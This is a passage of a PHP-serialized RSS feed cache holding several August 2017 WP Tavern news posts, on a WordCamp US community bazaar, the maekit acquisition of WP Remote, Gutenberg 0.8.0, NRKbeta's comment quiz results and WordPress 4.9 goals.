href="https://2017.us.wordcamp.org/">WordCamp US</a> will have a <a href="https://2017.us.wordcamp.org/attendee-information/community-bazaar/">Community Bazaar</a>. An area will be set aside in the venue allowing those chosen to showcase their WordPress communities. Raquel Landefeld, Randy Hicks, and Dustin Meza are organizing the Bazaar.</p>\n<p>Landefeld says the idea was inspired by the people who make up the WordPress Community. &#8220;We recognize that some local WordPress communities are thriving and some are just getting started,&#8221; she said.</p>\n<p>&#8220;What better way to help build community then by showcasing our local communities to the world. The thought is that smaller, newer, and communities just in their infancy, will be inspired with fresh ideas and or how-tos from the bigger and more established WordPress communities.&#8221;</p>\n<p>The idea is similar to that of a science fair where each community chosen will have a space to highlight why theirs is awesome.</p>\n<p>The purpose of the event is to inspire growth while providing an opportunity for communities to learn from each other. There will also be metrics shared such as, number of meetup and WordCamp attendees, meetups per month, and unique qualities pertaining to the local groups.</p>\n<p>The organizing team is looking for the inside scoop on local communities. &#8220;This is all about you and your local WordPress community,&#8221; Landefeld said.</p>\n<p>&#8220;This is your time to shine. Why is your community different, special, or amazing? Be showy! Forget modesty. Let your community’s awesomeness be a tool to inspire other WP communities just getting started or striving.&#8221;</p>\n<p>Last year saw record growth for WordPress community events. In 2016, more than 62,566 people attended a local meetup in 58 countries and about one-third of those were new members. A total of 115 WordCamps were hosted in 41 different countries.</p>\n<p>Those interested in participating in the Bazaar are encouraged to fill out the following <a href="https://2017.us.wordcamp.org/attendee-information/community-bazaar/">submission form</a> and provide as many details as possible.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 16 Aug 2017 00:45:34 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:15;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:77:"WPTavern: maekit Acquires WP Remote, Plans to Add Cloud-Based Backup Services";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74100";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:87:"https://wptavern.com/maekit-acquires-wp-remote-plans-to-add-cloud-based-backup-services";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3661:"<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2017/08/maekit-wpremote.png?ssl=1"><img /></a></p>\n<p><a href="https://maek.it/" target="_blank">maekit</a>, a cloud-based platform that handles the business aspect of web design, has <a href="https://hmn.md/2017/08/10/wp-remote-finds-home-maekit/" target="_blank">acquired WP Remote from Human Made</a>. Two years after Human Made began searching for a buyer, maekit purchased WP Remote to integrate it with the company&#8217;s existing platform that caters to designers managing multiple clients.</p>\n<p>&#8220;WP Remote had remained a much-loved product with its users and despite receiving no ongoing development it had remained an iconic plugin in the WordPress community,&#8221; Human Made CEO Tom Willmot said.</p>\n<p>maekit took over WP Remote operations in March after closing the deal. According to maekit CEO Matt Holme, the company inherited 20,000 users with 120,000 WordPress websites. His team has maintained WP Remote in its original platform for the past few months before integrating it into maekit last week.</p>\n<p><a href="https://wpremote.com/" target="_blank">WP Remote</a> has offered unlimited, free WordPress site management (updating core, plugins, and themes with a single click) since 2010. It hasn&#8217;t received ongoing development for several years, but maekit plans to add backup features that will make bring it more up to speed with competitors like MangeWP, MainWP, and InfiniteWP.</p>\n<p>&#8220;We definitely plan to keep WP Remote free and expand its features,&#8221; Holme said. &#8220;Specifically we are looking at offering easy-to-manage cloud-based backup services. For example, hook up your Dropbox (or any other popular cloud based storage system) and schedule regular backups of your WP websites.&#8221;</p>\n<p>maekit&#8217;s acquisition of WP Remote gives the company&#8217;s customers the ability to deploy WordPress sites with one click and manage client sites and domains through a unified, white-labeled invoicing and payment system. The company has rolled out a few long-overdue bug fixes to WP Remote and Holme says the rest of maekit is functional but still technically in a closed beta mode.</p>\n<p>&#8220;Our revenue model revolves around direct sale hosting plans and also reselling integrated hosting plans for other leading global hosting providers,&#8221; Holme said. &#8220;We are refining the free invoicing and payment processing system built into maekit so that a maekit / WP Remote user can deploy a new hosted WP and charge their client a recurring monthly fee and retain the mark up they add on top of our base hosting prices as profit. This means literally no out of pocket expense for maekit / WP Remote users.&#8221;</p>\n<p>Although maekit&#8217;s one-click deployment service supports many popular CMS&#8217;s and e-commmerce platforms, including WordPress, Opencart, Drupal, Magento, and Joomla, Holme said the vast majority of the company&#8217;s customers are running on WordPress. Acquiring WP Remote brings a host of valuable new features to maekit&#8217;s customer base. maekit&#8217;s built-in client billing features, customized for freelancers and agencies, are what Holme says will differentiate the company from its competitors in the WordPress space.</p>\n<p>&#8220;I have a great deal of respect for these other WP management platforms and feel the size of the WP market means there is opportunity for all to succeed,&#8221; Holme said. &#8220;With the features of maekit also including new website deployment, invoicing, payment processing and client management, our platform is unique from the others.&#8221;</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 15 Aug 2017 03:50:43 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:16;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:104:"WPTavern: Gutenberg 0.8.0 Introduces 5 New Blocks: Categories, Text Columns, Shortcode, Audio, and Video";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74090";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:110:"https://wptavern.com/gutenberg-0-8-0-introduces-5-new-blocks-categories-text-columns-shortcode-audio-and-video";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:5712:"<p>Gutenberg <a href="https://make.wordpress.org/core/2017/08/11/whats-new-in-gutenberg-11th-august/" target="_blank">0.8.0</a> was released over the weekend with five new blocks, major improvements to existing blocks, and support for more publishing features that have been missing from the new editor&#8217;s sidebar. The release also carries out the controversial decision to <a href="https://wptavern.com/user-tracking-to-be-removed-from-gutenberg-in-upcoming-0-8-0-release" target="_blank">remove the opt-in usage tracking code from the plugin</a>.</p>\n<p>The new <a href="https://github.com/WordPress/gutenberg/pull/2102" target="_blank">Categories block</a> can be found under the Widgets section, as it&#8217;s output is based on the existing categories widget. The default display is an alphabetized list of categories, but the block settings include options to display as a dropdown, show post counts, and show hierarchy.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/08/categories-block.png?ssl=1"><img /></a></p>\n<p>A new Text Columns block allows users to split text content into multiple columns. The settings include a sliding scale for selecting 2-4 columns.</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2017/08/text-columns-block-e1502741151590.png?ssl=1"><img /></a></p>\n<p>Contributors are calling the Text Block &#8220;an initial exploration&#8221; of multiple columns for text-only content. Depending on testing, it may not be the implementation that ends up landing in the plugin permanently.</p>\n<p>&#8220;We&#8217;ve been over how difficult it is to get columns right, and also how already today third parties can build this,&#8221; Joen Asmussen <a href="https://github.com/WordPress/gutenberg/pull/2117#issuecomment-319347010" target="_blank">said</a>. &#8220;We may very well want an entirely different implementation than this one. But perhaps it&#8217;s good to get this in now and test it. Perhaps this can help inform how a better column implementation can work down the road. In fact we might want to merge this block in now, only to take it back out later again, same as the Cover Text block. For that reason, I think it&#8217;d be good to test this.&#8221;</p>\n<p>The new Video and Audio blocks are geared towards inserting files that have already been uploaded to the media library. However, I found the text on the video block to be confusing. If I was new to WordPress and didn&#8217;t understand how oEmbed works, I would be clicking inside the video block to figure out where to paste the URL.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/08/video-block.png?ssl=1"><img /></a></p>\n<p>The new Audio and Video blocks mirror the same kind of functionality that users have experienced when adding images to their sites. In the future, contributors may introduce more features to the audio block, such as additional playback types and looping, but the first iteration includes just the basics.</p>\n<p>Gutenberg 0.8.0 adds resizing handlers to the existing Image Block, making it easy for users to insert and quickly resize an image. If you review the <a href="https://github.com/WordPress/gutenberg/pull/2213" target="_blank">GitHub ticket</a> for this feature, it&#8217;s clear that it was not easy to implement. Image resizing has gone through several changes and may have more down the road, especially as it pertains to the behavior of the caption. Ultimately, the caption field should not be wider than the image so that the two are placed together.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/08/image-resizing-gutenberg.png?ssl=1"><img /></a></p>\n<p>This release introduces a post formats selector to the post settings sidebar. It includes a suggestion based on what blocks are in use in the post. One participant on the ticket noted that the suggestion gives too much importance to the post formats selection and might be confusing to users. The suggestion persists, despite a user switching the format to the one suggested. This is because Gutenberg cannot detect if it was explicitly set by the user or if the user selected the suggestion.</p>\n<p>&#8220;I happen to agree with you: post formats should go away,&#8221; Joen Asmussen <a href="https://github.com/WordPress/gutenberg/pull/2307#issuecomment-321232074" target="_blank">said</a>. &#8220;In fact part of the genesis of blocks as a concept is to provide a better interface than what post formats did. So the post format selector here is strictly a back-compat thing.&#8221;</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2017/08/post-format-selector.png?ssl=1"><img /></a></p>\n<p>Gutenberg contributors have also <a href="https://github.com/WordPress/gutenberg/pull/2288" target="_blank">updated</a> the <a href="https://github.com/WordPress/gutenberg/blob/master/docs/design.md" target="_blank">design document</a> for the project, offering more clarity on their goals and concepts they are using to build the editor:</p>\n<blockquote><p>Ultimately, the vision for Gutenberg is to make it much easier to author rich content. Through ensuring good defaults, wrapping and bundling advanced layout options blocks, and making the most important actions immediately available, authoring content with WordPress should be accessible to anyone.</p></blockquote>\n<p>The idea is to simplify content creation for users so that they only have to learn one interface &#8211; the block interface. The design document adds several new sections that elaborate on the concept of &#8220;everything is a block&#8221; and includes best practices that developers can reference when designing their own blocks.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 14 Aug 2017 22:18:21 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:17;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:115:"WPTavern: Early Results from NRKbeta’s Comment Quiz Plugin Show Readers Enjoy the Quiz but Rarely Leave a Comment";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74105";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:123:"https://wptavern.com/early-results-from-nrkbetas-comment-quiz-plugin-show-readers-enjoy-the-quiz-but-rarely-leave-a-comment";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3492:"<p>Earlier this year, <a href="https://nrkbeta.no/" target="_blank">NRKbeta</a>, the Norwegian Broadcasting Corporation’s media and technology site, <a href="https://wptavern.com/nrkbeta-open-sources-comment-quiz-plugin-for-wordpress" target="_blank">open sourced its comment quiz plugin for WordPress</a>. The site&#8217;s publishers have been experimenting with requiring their readers to complete a short, three-question quiz before giving access to the comment form on certain articles. The goal of the plugin was to prevent rants and off-topic responses by ensuring that commenters have read the article.</p>\n<p>NRKbeta has <a href="https://nrkbeta.no/2017/08/10/with-a-quiz-to-comment-readers-test-their-article-comprehension/" target="_blank">published some preliminary results</a> after six months of experimenting with a mandatory quiz before commenting.</p>\n<p>&#8220;On average, there are a lot more attempts – both correct and wrong – than actual comments,&#8221; NRKbeta journalist Ståle Grut said. &#8220;It seems many take the quiz to check how much they remember from the story – and not necessarily to leave a comment. Almost as a fun little game after reading.&#8221;</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2017/08/nkrbeta-comments.jpg?ssl=1"><img /></a></p>\n<p>Grut reported that on average the quiz has an error rate of 72%. His team suspects that the bulk of the wrong answers are coming site&#8217;s international readership, as most of the articles are posted in Norwegian, which can be difficult to translate.</p>\n<p>The sample is still relatively small, because the team hasn&#8217;t yet created any set rules for when authors should enable the quiz.</p>\n<p>&#8220;The idea was to test it on stories that had potential for a gloomy comments section,&#8221; Grut said. &#8220;It is something we are proud to rarely have here at NRKbeta.&#8221;</p>\n<p>On one story, NRKbeta staff made an error where it was impossible to submit the correct answer to the quiz, because it wasn&#8217;t listed. As a result, this article&#8217;s quiz received more than 1,000 wrong answers.</p>\n<p>One unexpected benefit of the plugin is that it makes it more of a hurdle for readers to leave short comments, such as &#8220;nice post&#8221; that don&#8217;t add much to the conversation.</p>\n<p>&#8220;This favors the most eager with the most time on their hands,&#8221; Grut said. &#8220;From time to time this has led to a decline in quality and tone, causing him to often abandon the quiz module.&#8221;</p>\n<p>These initial conclusions are in line with what we predicted when the plugin was released: the most motivated ranters are not significantly inconvenienced by a short quiz. Keeping comment sections free of trolls is not yet something that is easy to automate. It still requires time spent in the moderation queue.</p>\n<p>After the comment quiz plugin was enabled on the site, NRKbeta counted more than 300 articles around the web that had been published about the experiment. Quizzing commenters was hailed as one of the best new ideas for warding off trolls. However, the NRKbeta team cannot yet conclude whether the plugin is a success or not.</p>\n<p>&#8220;The numbers seem to show that the quiz has worked like a little game for many readers,&#8221; Grut said. &#8220;They like to take the quiz, but not to leave a comment. Being tested on how much they remember from the article seems to be the most popular use of our quiz.&#8221;</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sat, 12 Aug 2017 02:54:02 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:18;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:44:"WPTavern: In Case You Missed It – Issue 23";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:58:"https://wptavern.com?p=74121&preview=true&preview_id=74121";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:51:"https://wptavern.com/in-case-you-missed-it-issue-23";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:6478:"<a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2016/01/ICYMIFeaturedImage.png?ssl=1" rel="attachment wp-att-50955"><img /></a>photo credit: <a href="http://www.flickr.com/photos/112901923@N07/16153818039">Night Moves</a> &#8211; <a href="https://creativecommons.org/licenses/by-nc/2.0/">(license)</a>\n<p>There’s a lot of great WordPress content published in the community but not all of it is featured on the Tavern. This post is an assortment of items related to WordPress that caught my eye but didn’t make it into a full post.</p>\n<h2>Using WordPress to Publish Law Reviews</h2>\n<p>Kevin O&#8217;Keefe of Above the Law, <a href="http://abovethelaw.com/2017/08/kim-jong-un-has-much-to-teach-pentagon-about-speed-gen-hyten/">explains why</a> WordPress should be used to publish law reviews instead of printing them.</p>\n<blockquote><p>Ten years ago it would not have been as easy to set up, or license, a WordPress publishing platform by each law school. Most law professors were, and still are, publishing blogs on <a href="http://www.typepad.com/">TypePad</a>, an outdated and little used publishing software, originally produced by Six Apart.</p>\n<p>Today, WordPress is running almost 70 percent of the content management systems in the world. WordPress is regularly updated and enables a multi-user platform with multiple individual sites, all of which would be needed by a law school’s &#8216;printing press&#8217;.</p></blockquote>\n<h2>Glutenberg Free</h2>\n<p><a href="https://wordpress.org/plugins/glutenburg-free/">Gluternberg Free</a> is a WordPress plugin developed by Adam Silverstein that restores and maintains the post editing experience from WordPress 4.8.</p>\n<h2>Open Source Candy Bar Labels for WordCamps</h2>\n<p>If you&#8217;re organizing a WordCamp and want to give out Happiness bars, check out this <a href="https://github.com/dimensionmedia/WordCamp-Happiness-Bars">custom label design</a> used at WordCamp Miami 2016. The assets are open sourced and available for free for other WordCamp organizers to use.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">WordCamps: have “Happiness Bars” for your next event. <a href="https://twitter.com/hashtag/wcmia?src=hash">#wcmia</a> open-sourced the wrappers: <a href="https://t.co/LvtG3JlhAw">https://t.co/LvtG3JlhAw</a> <a href="https://t.co/hailcQCsXg">pic.twitter.com/hailcQCsXg</a></p>\n<p>&mdash; David Bisset (@dimensionmedia) <a href="https://twitter.com/dimensionmedia/status/896060900410445825">August 11, 2017</a></p></blockquote>\n<p></p>\n<h2>Instead of Threading Tweets, Consider Blogging Instead</h2>\n<p>Amanda Rush <a href="https://www.customerservant.com/next-time-youre-thinking-threading-twitter-write-blog-post-instead/">explains</a> the drawbacks of threading messages on Twitter and why blogging is a better option. Blog posts are easier to archive and link to, are not lost in the noise as quickly, and are a better user experience for consuming content.</p>\n<p>By the way, if you&#8217;ve already threaded a message on Twitter, Rush shares links to tools that can help capture a thread and turn it into a blog post.</p>\n<blockquote class="wp-embedded-content"><p><a href="https://www.customerservant.com/next-time-youre-thinking-threading-twitter-write-blog-post-instead/">The Next Time You&#8217;re Thinking About Threading On Twitter, Write A Blog Post Instead</a></p></blockquote>\n<p></p>\n<h2>The Story of HelloSales</h2>\n<p>iThemes published a <a href="https://ithemes.com/2017/08/10/story-of-our-newest-ithemes-product-hellosales/">detailed article</a> on how their newest product, <a href="https://ithemes.com/hellosales">HelloSales</a>, came to be. Cory Miller explains the product&#8217;s logo, name, and who the people are that are building it.</p>\n<blockquote><p>The rooster is essentially the symbol or emblem of Portugal. You’ll see it everywhere there when you go there (and I strongly encourage you to do so, even if I want to keep the place all to myself).</p>\n<p>It became obvious we wanted to include a rooster in the logo of HelloSales as a hat tip to Portugal and our team there. We also think it’s a great symbol for what we hope to help our customers do — make more money through their WooCommerce stores.</p>\n<p>Through several iterations of a name, we landed on HelloSales as a name, as yet another hat tip to the story — their company’s name, HelloDev — that led us here.</p></blockquote>\n<p>It&#8217;s a cool story and one I&#8217;d like to see more CEO and founders share when they acquire a product or business.</p>\n<h2>WordPress Telemetry Part Two</h2>\n<p>Morten Rand-Hendriksen <a href="https://www.linkedin.com/pulse/case-telemetry-wordpress-morten-rand-hendriksen">updated his article</a> on the case for WordPress telemetry after a <a href="https://twitter.com/mor10/status/895299336375902209">lengthy conversation</a> on Twitter.</p>\n<blockquote><p>What WordPress needs is an open debate on this topic. What are the arguments for and against? What can be gained and what is lost? Should we do this? And if so, how do we do it in an open, transparent, and responsible way that helps inform and elevate the conversation while looking after the interests of <em>all</em> WordPress users?</p></blockquote>\n<p>These are interesting questions and although the <a href="https://core.trac.wordpress.org/ticket/38418">ticket</a><a href="https://core.trac.wordpress.org/ticket/38418"> is closed</a> on Trac, users are encouraged to continue the discussion. In the future, I&#8217;d like to see data and other research published that explains <strong>why</strong> a major User Interface changing feature is necessary in core before so much energy is devoted to it.</p>\n<h2>Cowboy Wapuu!</h2>\n<p>In what is a traditional part of this series, I end each issue by featuring a Wapuu design. For those who don&#8217;t know, Wapuu is the <a href="http://wapuu.jp/2015/12/12/wapuu-origins/">unofficial mascot</a> of the WordPress project. Cowboy Wappu is the official mascot of <a href="https://2017.dfw.wordcamp.org/">WordCamp Dallas/Fort Worth 2017</a> that takes place on November 11-12. Tickets are still available and include admission to the event and after-party, lunch on Saturday, and swag. Yee-Haw!</p>\n<img />Cowboy Wapuu for WordCamp Dallas/Fort Worth 2017\n<p>That&#8217;s it for issue twenty-three. If you recently discovered a cool resource or post related to WordPress, please share it with us in the comments.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sat, 12 Aug 2017 01:47:43 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:19;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:105:"WPTavern: WordPress 4.9 to Focus on Code Editing and Customization Improvements, Targeted for November 14";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74086";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:115:"https://wptavern.com/wordpress-4-9-to-focus-on-code-editing-and-customization-improvements-targeted-for-november-14";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3929:"<a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2017/08/planning.jpg?ssl=1"><img /></a>photo credit: <a href="https://stocksnap.io/photo/Q3X736G951">Sophie Ollis</a>\n<p>WordPress core contributors have set a tentative <a href="https://make.wordpress.org/core/4.9/" target="_blank">schedule for the upcoming 4.9 release</a>, which will be co-led by Mel Choyce and Weston Ruter. The development cycle kicked off in early August with Beta 1 scheduled for early October and the official release targeted for November 14.</p>\n<p>Choyce published a <a href="https://make.wordpress.org/core/2017/08/11/wordpress-4-9-goals/" target="_blank">list of goals</a> today that outlines what they will be aiming for in 4.9. WordPress users can expect to see some existing features polished up to be more user-friendly, including some long-awaited updates to the experience of editing theme and plugin files in the admin.</p>\n<p>Contributors are looking at <a href="https://core.trac.wordpress.org/ticket/6531" target="_blank">adding a nested folder structure</a> that will offer access to files deeper than two levels. They are also aiming to <a href="https://core.trac.wordpress.org/ticket/31779" target="_blank">add better warnings</a> for users who are editing themes and plugins, an improvement which Choyce described as &#8220;graduating from cowboy coding school.&#8221; This could help prevent users from unknowingly making small errors that could have a negative impact on their sites.</p>\n<p>Another goal for 4.9 is to improve the code editing experience by adding syntax highlighting. Contributors are examining the possibility of incorporating CodeMirror functionality into the Customizer&#8217;s custom CSS box as well as the plugin and theme file editors. An experimental <a href="https://github.com/WordPress/codemirror-wp" target="_blank">Syntax Highlighting Code Editor for WordPress Core</a> plugin is currently being developed on GitHub as a potential solution for a seven-year-old trac <a href="https://core.trac.wordpress.org/ticket/12423" target="_blank">ticket</a> for code editor improvements.</p>\n<p>Customizer improvements are also one of the main focuses for 4.9. Contributors to the Customize Snapshots feature plugin have been <a href="https://wptavern.com/customize-snapshots-0-6-0-adds-the-ability-to-name-and-merge-changesets" target="_blank">steadily refining</a> the ability to <a href="https://core.trac.wordpress.org/ticket/39896" target="_blank">draft</a> and <a href="https://core.trac.wordpress.org/ticket/28721" target="_blank">schedule</a> changesets in the Customizer. They are also looking at providing a better experience for <a href="https://core.trac.wordpress.org/ticket/39693" target="_blank">widget</a> and <a href="https://core.trac.wordpress.org/ticket/39692" target="_blank">menu mapping</a> when switching between themes, improving homepage settings (&#8220;<a href="https://core.trac.wordpress.org/ticket/16379" target="_blank">Page on Front</a>&#8220;), and displaying responsive images in the Customizer sidebar.</p>\n<p>This list of goals for 4.9 includes many more items and the release leads are approaching it with the understanding that some features and improvements may not be ready in time. One item on the list is getting in <a href="https://github.com/WordPress/gutenberg/issues?q=is%3Aopen+is%3Aissue+label%3A%22Core+REST+API+Task%22" target="_blank">API endpoints that Gutenberg requires</a>.</p>\n<p>Looking ahead to WordPress 5.0, new Gutenberg design lead Tammie Lister has <a href="https://make.wordpress.org/core/2017/08/11/revised-suggested-roadmap-for-gutenberg-and-customization/" target="_blank">proposed a revised, tentative roadmap</a> that anticipates having the new editor ready for a merge proposal in December 2017. Lister said the outline is not set in stone and Gutenberg&#8217;s path to 5.0 would be dependent on the success of the merge proposal.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 11 Aug 2017 19:19:04 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:20;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:117:"WPTavern: WordPress.com’s Business Plan Gives Subscribers a Way to Tap into WordPress.org’s Third-party 